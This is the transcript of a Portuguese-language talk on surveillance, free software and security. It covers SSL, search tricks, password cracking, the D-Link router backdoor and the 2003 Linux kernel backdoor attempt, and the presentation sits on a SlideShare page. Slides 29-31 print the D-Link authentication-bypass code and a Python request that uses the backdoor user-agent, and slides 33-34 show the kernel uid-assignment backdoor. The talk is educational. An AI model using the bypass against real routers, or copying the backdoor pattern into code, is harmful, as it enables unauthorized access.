Your SlideShare is downloading. ×
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Espionagem e Software Livre
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Espionagem e Software Livre

629

Published on

A espionagem através de softwares e internet é o assunto do momento, que estorou …

A espionagem através de softwares e internet é o assunto do momento, que estorou
quando Edward Snowden vazou documentos que mostravam que o governo americano
tinha acesso aos dados de vários países inclusive o Brasil.

Mas será se isso é de hoje ou faz tempo que somos vigiados e só agora sabemos?

E ainda, a que ponto sermos espionados nos causa algum prejuízo?

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
629
On Slideshare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
7
Comments
0
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Espionagem e Software Livre Endagamentos e conclus˜oes ´Atila Camurc¸a September 13, 2014
  • 2. Sumary 1 Introduc¸˜ao 2 Acesso seguro atrav´es da internet 3 Hackers e Crackers Hackeando Google e Duck Duck Go T´ecnicas para quebrar senhas Vazamento de senhas ao Linkedin Engenharia reversa em firmware D-Link Ataque ao Kernel 4 Marco Civil da Internet no Brasil
  • 3. Sobre Mim Graduando em Ciˆencia da Computac¸˜ao pelo IFCE. 7 anos de experiˆencia com Linux. Organizador do COMSOLiD a 6 anos.
  • 4. Introduc¸˜ao Figure : Nicol´as Maduro e Dilma Rousseff
  • 5. SSL Secure Socket Layer
  • 6. Acesso seguro atrav´es da internet Para acessar a internet com seguranc¸a usamos o protocolo SSL junto com o HTTP. Figure : SSL do Gmail
  • 7. Acesso seguro atrav´es da internet SSL ´e uma nova camada de protocolo que opera em cima do protocolo TCP. Permite ambas as m´aquina, cliente e servidor, estabelecer uma conex˜ao criptografada.
  • 8. Acesso seguro atrav´es da internet Entretanto isso ´e uma especificac¸˜ao, ou seja, algu´em tem que implementar. Algumas empresas que o implementam: OpenSSL (http://www.openssl.org/) - Implementac¸˜ao livre e gratuita do SSL. Apache-SSL (http://www.apache-ssl.org/) - um servidor web seguro, baseado no OpenSSL. SSLeay (ftp://ftp.uni-mainz.de/pub/internet/security/ssl/SSL/) - uma implementac¸˜ao gratuita do Netscape’s Secure Socket Layer. Planet SSL (http: //www.rsasecurity.com/standards/ssl/developers.html) - provˆe SSL para programas em C e Java.
  • 9. Acesso seguro atrav´es da internet Exemplo de mesma implementac¸˜ao para problemas diferentes: multiplicac¸˜ao de 2 n´umeros: 2 * 3 ou 2 + 2 + 2
  • 10. Software Livre ´e seguro?
  • 11. Software Livre ´e seguro? Figure : C´odigos Compilados
  • 12. Software Livre ´e seguro? Figure : C´odigos Interpretados
  • 13. O qu˜ao ´e seguro uma criptografia usando SSL?
  • 14. Levaria um tempo significativamente maior que a idade do universo para quebrar uma chave de 128-bits. Estima-se um pouco mais de 13 bilh˜oes de anos. Fonte: http://www.inet2000.com/public/encryption.htm http://www.digicert.com/TimeTravel/math.htm
  • 15. Hackers e Crackers
  • 16. Hackers e Crackers Crackers s˜ao pessoas que invadem computadores com prop´ositos criminais ou ganho pessoal. Enquanto Hackers podem ser especialistas em seguranc¸a contratados por empresas, com o objetivo de encontrar poss´ıveis vulnerabilidades e san´a-las.
  • 17. Hackeando Google Hackear ´e uma coisa boa! Alguns sites permitem que isso seja feito de forma a otimizar processos, como fazer uma busca. Vejamos um exemplo com o Google quando fazemos a seguinte busca: comsolid filetype:pdf Al´em de buscar a palavra comsolid, ele busca apenas arquivos pdf.
  • 18. Hackeando Google Ou ainda podemos fazer buscas em determinados sites somente. Basta fazer uma busca na forma: inkscape site:comsolid.org Essa busca pesquisa a palavra inkscape no site comsolid.org
  • 19. Hackeando Duck Duck Go Duck Duck Go ´e um motor de busca preocupado com a pesquisa em si e sua privacidade. https://duckduckgo.com/ Possui parte de seu c´odigo livre, isso inclui plugins, add-ons, etc. P´agina do github: https://github.com/duckduckgo/
  • 20. Hackeando Duck Duck Go Duck Duck Go permite hacks mais engenhosos. Vamos a eles: !g comsolid - busca comsolid no google expand http://va.mu/dIwg - mostra a URL original ip address - mostra seu enderec¸o IP github sige - mostra reposit´orios do github @comsolid - mostra usu´ario do Twitter age of linus torvalds - diz a idade define free software - define uma palavra ou frase weather in fortaleza - mostra a previs˜ao do tempo daft punk soundcloud - busca m´usicas no soundcloud
  • 21. Hackeando Duck Duck Go Temos ainda o http://duckduckhack.com/ Figure : Duck Duck Hack
  • 22. T´ecnicas para quebrar senhas
  • 23. T´ecnicas para quebrar senhas A t´ecnica mais conhecida e natural ´e a forc¸a bruta, ou seja, tentar todas as combinac¸˜oes poss´ıveis at´e encontrar. Isso funciona at´e certo ponto, quando a entrada ´e pequena. Num artigo escrito por Dan Goodin no site http://arstechnica.com em que descreve como Kevin Young, um pesquisador de seguranc¸a de senhas, procedeu para descriptografar senhas vazadas pelo Antisec de uma empresa chamada Stratfor.
  • 24. T´ecnicas para quebrar senhas Ap´os quebrar 60% das senhas usando listas de senhas dispon´ıveis em: Hashcat - http://hashcat.net/oclhashcat-plus/ John the Ripper - http://www.openwall.com/john/ Para os outros 40% ele ficou “sem palavras”, ent˜ao onde encontr´a-las? Que tal Wikipedia, Youtube, B´ıblia, Projeto Gutenberg?
  • 25. T´ecnicas para quebrar senhas Uma das senhas era “crotalus atrox”, nome cient´ıfico de uma cobra. Tal senha foi quebrada grac¸as a esta p´agina da Wikipedia: https://en.wikipedia.org/wiki/Crotalus_atrox Em seguida outras senhas fortes por serem grandes foram encontradas como: “from genesis to revelations” (26) “I cant remember anything” (24) “thereisnofatebutwhatwemake” (26) “givemelibertyorgivemedeath” (26)
  • 26. Vazamento de senhas ao Linkedin Em Junho de 2012 um usu´ario anˆonimo postou no site http://insidepro.com/ uma lista com 6.5 milh˜oes de hashs ´unicos referentes a senhas pedindo ajuda para recuper´a-las. Ap´os quebrar muitas das senhas descobriu-se que se tratava de um banco de senhas do site Linkedin. Essa descoberta foi poss´ıvel pelo n´umero de senhas com a palavra linkedin.
  • 27. Vazamento de senhas ao Linkedin Na lista existiam: 1 - linkedin (4408) 2 - link (2638) 3 - linked (2135) Outras senhas encontradas: 8 - love (1018) 11 - password (856) 16 - abc (750) Mais informac¸˜oes em: http: //www.ma.rhul.ac.uk/static/techrep/2013/MA-2013-07.pdf
  • 28. Engenharia reversa em firmware D-Link Todos sabemos que a D-Link ´e especializada em fazer roteadores, e eles s˜ao um bom local para backdoors. E isso foi exatamente que Craig Heffner autor no blog http://www.devttys0.com encontrou. Ele encontrou a partir de uma engenharia reversa no firmware de uma dos roteadores.
  • 29. Engenharia reversa em firmware D-Link Ap´os notar que certa func¸˜ao chamada alpha auth check soava suspeita, ele foi saber o que exatamente ela fazia. Ap´os um tempo ele chegou no seguinte trecho de c´odigo: int alpha_auth_check(struct http_request_t *request) { if(strstr(request->url, "graphic/") || strstr(request->url, "public/") || strcmp(request->user_agent, "xmlset_roodkcableoj28840ybtide") == 0) { return AUTH_OK; } else { if(check_login(request->0xC, request->0xE0) != 0) { return AUTH_OK; } } return AUTH_FAIL; }
  • 30. Engenharia reversa em firmware D-Link Baseado no c´odigo fonte das p´aginas HTML e outros detalhes ´e sensato concluir que os seguintes modelos s˜ao afetados: DIR-100 DIR-120 DI-624S DI-524UP DI-604S DI-604UP DI-604+ TM-G5240
  • 31. Engenharia reversa em firmware D-Link Quem quiser fazer um teste real existe um c´odigo em Python escrito pelo pr´oprio Craig e pode ser encontrado em: http://pastebin.com/vbiG42VD # Normally only admins can access the tools_misc.xgi page; # use the backdoor user-agent to bypass authentication import urllib2 # ... req = urllib2.Request(url+buf, headers={ ’User-Agent’: ’xmlset_roodkcableoj28840ybtide’ }) urllib2.urlopen(req)
  • 32. Ataque ao Kernel
  • 33. Ataque ao Kernel http://linux.slashdot.org/story/13/10/09/1551240/ the-linux-backdoor-attempt-of-2003 Em 2003, houve uma tentativa de backdoor no Kernel do Linux. /* ... */ if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; /* ... */ Bastava chamar a func¸˜ao wait4 e vocˆe viraria root.
  • 34. Ataque ao Kernel Comparemos os c´odigos original e o backdoor, e vejam se encontram a diferenc¸a. /* ... */ if ((options == (__WCLONE|__WALL)) && (current->uid == 0)) retval = -EINVAL; /* ... */ /* ... */ if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; /* ... */
  • 35. Marco Civil da Internet no Brasil O que ´e Marco Civil? ´E um projeto de Lei que visa estabelecer direitos e deveres na utilizac¸˜ao da Internet no Brasil. ´E a constituic¸˜ao da Internet no pa´ıs.
  • 36. Quais s˜ao os direitos e deveres? Neutralidade: pro´ıbe que provedores de internet discriminem certos servic¸os em detrimento de outros. Armazenamento de dados: Operac¸˜ao de coleta de dados no Brasil deve respeitar a privacidade, protec¸˜ao dos dados e sigilo das comunicac¸˜oes privadas. Retirada de conte´udo: entidades que oferecem conte´udo e aplicac¸˜oes s´o ser˜ao responsabilizadas por danos gerados por terceiros se n˜ao acatarem ordem judicial exigindo a retirada dessas publicac¸˜oes.
  • 37. Quais s˜ao os direitos e deveres? Fim do marketing dirigido: as empresas de acesso n˜ao poder˜ao “espiar” o conte´udo das informac¸˜oes trocadas pelos usu´arios na rede. H´a interesse em fazer isso com fins comerciais, como para publicidade. Sigilo e privacidade: Provedores de acesso `a internet ser˜ao obrigados a guardar os registros das horas de acesso e do fim da conex˜ao dos usu´arios pelo prazo de seis meses, mas isso deve ser feito em ambiente controlado. Para mais detalhes: http://www.molon1313.com.br/marco-civil-da-internet/
  • 38. Onde encontrar essa palestra? Vocˆe pode baixar essa palestra e ainda outras em: http://sige.comsolid.org/u/atilacamurca
  • 39. D´uvidas?
  • 40. Conecte-se E-mail: camurca.home@gmail.com Twitter: http://twitter.com/#!/atilacamurca Blog MAD3 Linux: http://www.mad3linux.org COMSOLiD: http://comsolid.org/ http://twitter.com/#!/comsolid https://www.facebook.com/comsolid Github: https://www.github.com/atilacamurca

×